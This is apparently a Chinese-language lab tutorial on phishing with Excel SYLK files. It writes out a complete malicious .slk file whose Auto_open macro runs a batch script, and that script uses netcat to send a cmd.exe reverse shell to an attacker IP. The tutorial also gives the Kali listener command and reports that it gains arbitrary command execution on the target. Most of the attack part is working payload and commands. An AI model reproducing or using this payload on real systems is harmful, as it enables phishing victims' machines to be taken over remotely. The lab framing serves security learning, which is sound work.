通過Windows的office，可以實施許多釣魚攻擊，這里對其中的SLK，進行一個模擬釣魚攻擊，直接反彈shell。

環(huán)境

本文使用的環(huán)境和工具如下（可選擇其他版本的系統(tǒng)和office）：

• Netcat for Windows，即nc.exe

攻擊機1（用于制造釣魚文件）：

• Windows 10
• Microsoft Office Excel 2016

攻擊機2：

• kali

靶機：

• Windows 10
• Microsoft Office Excel 2016（不一定需要和攻擊機一致）

相關(guān)知識

• 釣魚攻擊：釣魚式攻擊是指企圖從電子通訊中，通過偽裝成信譽卓著的法人媒體以獲得如用戶名、密碼和信用卡明細等個人敏感信息的犯罪詐騙過程。
• Symbolic Link：Symbolic Link (SYLK) 是一種 Microsoft 文件格式，通常用于在應用程序（特別是電子表格）之間交換數(shù)據(jù)。 SYLK 文件通常具有 .slk 后綴。 它僅由可顯示的 ANSI 字符組成，可以由其他應用程序（例如數(shù)據(jù)庫）輕松創(chuàng)建和處理。

釣魚文件準備

在攻擊機1上準備釣魚文件（如果沒有那么多虛擬機，直接在靶機上制作也可）：

首先，新建一個TXT文件，并打開，輸入以下內(nèi)容：

ID;P
O;E
NN;NAuto_open;ER101C1;KOut Flank;F
C;X1;Y101;K0;EEXEC("c:\shell.cmd")
C;X1;Y102;K0;EHALT()
E

完成之后點擊保存，重命名，更改后綴為slk：

重命名后的文件

將該文件傳至靶機，任意目錄均可。

下載Netcat for Windows，解壓，移動到靶機上，記住其存放地址

新建一個TXT文件，寫入內(nèi)容：

C:\tools\nc.exe 10.0.0.5 443 -e cmd.exe

其中，C:\tools\nc.exe為剛剛記住的nc的存放路徑，10.0.0.5為反彈shell的攻擊機ip

重命名該文件為shell.cmd，然后移動到靶機的C盤根目錄下

實施攻擊

打開攻擊機2，也就是kali，輸入命令回車：

nc -lvnp 443

可以看到，監(jiān)聽已經(jīng)建立：

監(jiān)聽建立

然后打開靶機，在靶機內(nèi)打開釣魚文件，點擊啟用內(nèi)容：

打開釣魚文件

查看Windows下方任務欄，可以看到喚起了一個cmd程序：

喚起的cmd程序

同時，可以看到kali上已經(jīng)建立了連接，可以在靶機上執(zhí)行任意命令：

反彈shell成功

說明釣魚攻擊反彈shell成功。

參考資料

• Phishing: .SLK Excel
• Symbolic Link